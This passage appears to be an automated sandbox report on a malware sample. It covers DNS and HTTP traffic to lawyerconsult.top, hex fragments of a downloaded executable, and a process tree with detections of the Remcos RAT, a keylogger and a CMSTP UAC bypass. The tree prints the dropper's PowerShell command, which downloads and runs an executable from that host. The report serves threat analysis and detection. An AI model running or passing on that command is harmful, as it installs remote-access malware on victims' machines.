                                      Sep 25, 2024 18:33:56.048851967 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.579227924 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.579276085 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.584476948 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.589344025 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.589386940 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.589401960 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.589440107 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.594111919 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.598989010 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599018097 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599066973 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599067926 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.599081993 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599097967 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599102974 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.599133015 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.599271059 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599286079 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599302053 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599318027 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599333048 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599334002 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.599349022 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599356890 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.599365950 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599391937 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.599595070 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599608898 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599622965 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599633932 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.599637032 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599654913 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599669933 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599674940 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.599685907 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599701881 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599709988 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.599718094 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599725008 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.599733114 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599754095 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.599755049 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599805117 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.599973917 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.599999905 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.600014925 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.600029945 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.600120068 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.600133896 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.600152016 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.600167036 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.600168943 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.600192070 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.600368023 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.600385904 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.600402117 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.600416899 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.600424051 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.600431919 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.600446939 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.600446939 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.600461960 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.600462914 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.600476027 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.600492001 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.600497007 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.600558043 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:56.600569963 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.641315937 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:56.855684996 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:57.144357920 CEST4969980192.168.2.7172.94.3.25
                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 25, 2024 18:33:51.591351032 CEST5323953192.168.2.71.1.1.1
                                      Sep 25, 2024 18:33:51.602655888 CEST53532391.1.1.1192.168.2.7
                                      Sep 25, 2024 18:34:22.619832039 CEST5351679162.159.36.2192.168.2.7
                                      Sep 25, 2024 18:34:23.119596004 CEST5975053192.168.2.71.1.1.1
                                      Sep 25, 2024 18:34:23.132997036 CEST53597501.1.1.1192.168.2.7
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Sep 25, 2024 18:33:51.591351032 CEST192.168.2.71.1.1.10x4914Standard query (0)lawyerconsult.topA (IP address)IN (0x0001)false
                                      Sep 25, 2024 18:34:23.119596004 CEST192.168.2.71.1.1.10x85eaStandard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Sep 25, 2024 18:33:51.602655888 CEST1.1.1.1192.168.2.70x4914No error (0)lawyerconsult.top172.94.3.25A (IP address)IN (0x0001)false
                                      Sep 25, 2024 18:34:23.132997036 CEST1.1.1.1192.168.2.70x85eaName error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                      • lawyerconsult.top
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.749699172.94.3.25803652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 25, 2024 18:33:51.627652884 CEST172OUTGET /AUGUST.exe HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: lawyerconsult.top
                                      Connection: Keep-Alive
                                      Sep 25, 2024 18:33:52.250852108 CEST302INHTTP/1.1 200 OK
                                      Content-Length: 4809996
                                      Last-Modified: Wed, 25 Sep 2024 11:52:30 GMT
                                      Content-Type: application/x-msdownload
                                      Date: Wed, 25 Sep 2024 16:33:52 GMT
                                      ETag: "f30293f7a768b837cdb37fc8b138e7a1-1727265150-4809996"
                                      Accept-Ranges: bytes
                                      Server: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2
                                      Sep 25, 2024 18:33:52.250910997 CEST1236INData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75
                                      Data Ascii: MZ`@`!L!Require Windows$PEL~&L0@03P
                                      Sep 25, 2024 18:33:52.251187086 CEST1236INData Raw: 50 ff 52 1c 83 3d 68 77 41 00 02 8b f0 74 0e 6a 00 ff 35 dc 77 41 00 ff 15 38 32 41 00 8b c6 5e c2 04 00 56 8b f1 33 c0 57 8b 7c 24 0c 89 06 89 46 04 89 46 08 ff 77 04 e8 1a fe ff ff ff 37 ff 36 e8 e1 fd ff ff 8b 47 04 59 59 89 46 04 5f 8b c6 5e
                                      Data Ascii: PR=hwAtj5wA82A^V3W|$FFw76GYYF_^Vff Wt$YWt$6YY~_^VW|$;t#ff w76rGYYF_^S\$VWy+qN;~0@~+3H
                                      Sep 25, 2024 18:33:52.251240969 CEST448INData Raw: 74 1a 83 f8 40 74 07 6a 66 e9 71 ff ff ff 8b 45 dc 89 46 30 8b 45 e0 89 46 34 eb 18 8d 45 b4 50 ff 15 c4 30 41 00 8d 46 30 50 8d 45 b4 50 ff 15 4c 31 41 00 39 7e 38 74 17 ff 33 e8 6c 1b 00 00 85 c0 59 0f 85 3e ff ff ff 6a 68 e9 2f ff ff ff 8b 03
                                      Data Ascii: t@tjfqEF0EF4EP0AF0PEPL1A9~8t3lY>jh/N0QPYY%j;Ytx03AH3PMFFjQHxxP1ASMEEP;Y};ujjVP ujE;Yt
                                      Sep 25, 2024 18:33:52.251602888 CEST1236INData Raw: 50 1c ff 75 f0 8b f0 e8 8a 02 01 00 59 8d 4d c4 e8 2c d3 00 00 8b c6 5e 5f 5b c9 c2 10 00 56 6a 00 ff 74 24 0c ff 15 3c 30 41 00 85 c0 75 30 ff 15 50 31 41 00 be b7 00 00 00 3b c6 74 0b 50 ff 15 64 31 41 00 33 c0 5e c3 ff 74 24 08 ff 15 38 30 41
                                      Data Ascii: PuYM,^_[Vjt$<0Au0P1A;tPd1A3^t$80AtuV3@^<uPpA< t<tt<t33@UQEjEEPjEPjEED0AP@0AD$Hfw0HfwWHfw7Vt$
                                      Sep 25, 2024 18:33:52.251645088 CEST1236INData Raw: 00 8d 45 f8 50 ff 75 08 ff 15 e8 32 41 00 0f b7 c0 50 68 c8 33 41 00 e8 87 fd ff ff 8b d8 33 f6 83 c4 0c 3b de 0f 84 d9 00 00 00 83 7d f8 10 0f 82 cf 00 00 00 ff 75 f8 6a 40 ff 15 70 30 41 00 ff 75 f8 8b f8 53 57 e8 8e fd 00 00 83 c4 0c 56 ff 15
                                      Data Ascii: EPu2APh3A3;}uj@p0AuSWV3AEPVW3A9uEPhLAVVu2AEPQWl0AE;tfURuPQ9ut?uYMQjPE 0AjuuVVVu2AuVhru2AE
                                      Sep 25, 2024 18:33:52.252248049 CEST208INData Raw: 83 ff 40 7e 09 8b c7 99 2b c2 d1 f8 eb 0f 33 c0 83 ff 08 0f 9e c0 48 83 e0 0c 83 c0 04 8d 14 30 3b d3 7d 04 2b de 8b c3 03 f8 57 e8 70 ff ff ff 5f 5e 5b c2 04 00 8b 01 8b 51 04 8b 4c 24 08 2b d1 8d 54 12 02 8d 0c 48 52 51 8b 4c 24 0c 8d 04 48 50
                                      Data Ascii: @~+3H0;}+Wp_^[QL$+THRQL$HP1AT$Vt$BFu^V2<1tA;J|2^PpA^$u;ut;B|2S\
                                      Sep 25, 2024 18:33:52.252285004 CEST1236INData Raw: 24 10 85 db 56 57 75 04 33 f6 eb 02 8b 33 8b 7c 24 10 eb 18 8b 47 0c 8b 04 b0 ff 74 24 14 8b 00 50 ff 15 98 30 41 00 85 c0 74 0c 46 3b 77 08 7c e3 33 c0 5f 5e 5b c3 85 db 74 02 89 33 8b 47 0c 8b 04 b0 eb ee 56 8b f1 ff 76 0c e8 ce f7 00 00 ff 36
                                      Data Ascii: $VWu33|$Gt$P0AtF;w|3_^[t3GVv6YY^t$t$t$t@3U@}u3lwAE@uEEP0At7M3;w.rE;Es$j+PoRYYtlwAlwA3@t$Yu
                                      Sep 25, 2024 18:33:52.252341986 CEST224INData Raw: 00 8b 45 e4 3b c3 0f 84 bf 00 00 00 03 f0 8d 85 e0 ef ff ff 33 ff 89 45 f8 38 5d ff 8b c6 74 3d 2b 45 e8 3b f8 77 60 ff 75 e8 ff 75 10 ff 75 f8 e8 27 f3 00 00 83 c4 0c 85 c0 0f 84 87 00 00 00 8b 45 f8 8a 00 3a c3 88 45 e0 74 7f ff 75 e0 8b 4d 14
                                      Data Ascii: E;3E8]t=+E;w`uuu'E:EtuM5GE+E;w#uuuuEEE+}V=]PP1A9]w}"M39Y2_^[UQM&
                                      Sep 25, 2024 18:33:52.252602100 CEST1236INData Raw: 00 8a 0f eb 17 80 f9 3d 74 20 ff 75 fc 8b 4d 08 e8 97 fc ff ff ff 06 8b 06 8a 0c 07 8a c1 88 4d fc e8 12 f0 ff ff 84 c0 74 db 8b 45 08 c9 c3 55 8b ec 83 ec 18 83 3d f0 77 41 00 03 75 0c 6a 7a e8 17 f0 ff ff e9 86 00 00 00 56 57 8d 4d e8 e8 c6 fb
                                      Data Ascii: =t uMMtEU=wAujzVWMEu<t<tPM7GuhEPEP}_^uu5PpAjj4Mj j&MuuY2YU4VWME0>f
                                      Sep 25, 2024 18:33:52.257424116 CEST1236INData Raw: 8b 45 d8 2b 45 d0 53 53 57 ff 75 fc 50 8b 45 d4 2b 45 cc 50 ff 75 d0 ff 75 cc 68 04 08 00 50 68 5c 33 41 00 68 5c 34 41 00 53 ff 15 54 32 41 00 8b f8 3b fb 0f 84 7b ff ff ff 56 ff 15 3c 32 41 00 8b 35 f4 32 41 00 53 6a 22 68 59 04 00 00 57 ff d6
                                      Data Ascii: E+ESSWuPE+EPuuhPh\3Ah\4AST2A;{V<2A52ASj"hYWj2APShCWPEEPEP]uEPhaWuuYYUQSVW=0AjEPuuCPECSuPu>W


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:1
                                      Start time:12:33:48
                                      Start date:25/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe
                                      Imagebase:0x7ff7d04d0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:12:33:48
                                      Start date:25/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:12:33:48
                                      Start date:25/09/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:11
                                      Start time:12:34:00
                                      Start date:25/09/2024
                                      Path:C:\Users\user\AppData\Roaming\hello.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming/hello.exe
                                      Imagebase:0x400000
                                      File size:4'809'996 bytes
                                      MD5 hash:25860926414BF43383246F7C773A8D6C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000B.00000003.1378606402.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 3%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:12
                                      Start time:12:34:01
                                      Start date:25/09/2024
                                      Path:C:\Users\user\DZIPR.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\DZIPR.exe"
                                      Imagebase:0x400000
                                      File size:8'767'704 bytes
                                      MD5 hash:EC9CE1D67F98072281015C7726FBA245
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000C.00000000.1381062753.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\DZIPR.exe, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:13
                                      Start time:12:34:02
                                      Start date:25/09/2024
                                      Path:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                      Imagebase:0x400000
                                      File size:8'767'704 bytes
                                      MD5 hash:EC9CE1D67F98072281015C7726FBA245
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:14
                                      Start time:12:34:03
                                      Start date:25/09/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\cmd.exe
                                      Imagebase:0x410000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:true

                                      Target ID:15
                                      Start time:12:34:03
                                      Start date:25/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:18
                                      Start time:14:11:30
                                      Start date:25/09/2024
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                      Imagebase:0x7ff7b4ee0000
                                      File size:55'320 bytes
                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:19
                                      Start time:14:11:39
                                      Start date:25/09/2024
                                      Path:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                      Imagebase:0x400000
                                      File size:8'767'704 bytes
                                      MD5 hash:EC9CE1D67F98072281015C7726FBA245
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:20
                                      Start time:14:11:39
                                      Start date:25/09/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\cmd.exe
                                      Imagebase:0x410000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                      Has exited:true

                                      Target ID:21
                                      Start time:14:11:39
                                      Start date:25/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:22
                                      Start time:14:11:45
                                      Start date:25/09/2024
                                      Path:C:\Windows\SysWOW64\explorer.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                      Imagebase:0xe50000
                                      File size:4'514'184 bytes
                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:true

                                      Target ID:23
                                      Start time:14:11:58
                                      Start date:25/09/2024
                                      Path:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
                                      Imagebase:0x400000
                                      File size:8'767'704 bytes
                                      MD5 hash:EC9CE1D67F98072281015C7726FBA245
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:24
                                      Start time:14:11:58
                                      Start date:25/09/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\cmd.exe
                                      Imagebase:0x410000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:true

                                      Target ID:25
                                      Start time:14:11:58
                                      Start date:25/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:14:11:59
                                      Start date:25/09/2024
                                      Path:C:\Windows\SysWOW64\explorer.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                      Imagebase:0xe50000
                                      File size:4'514'184 bytes
                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001A.00000002.1827195478.00000000005CB000.00000004.00000001.01000000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001A.00000002.1827230846.00000000005CF000.00000008.00000001.01000000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.1827055009.00000000005C2000.00000008.00000001.01000000.00000000.sdmp, Author: Joe Security
                                      Has exited:true

                                      Target ID:27
                                      Start time:14:12:01
                                      Start date:25/09/2024
                                      Path:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                      Imagebase:0x400000
                                      File size:8'767'704 bytes
                                      MD5 hash:EC9CE1D67F98072281015C7726FBA245
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
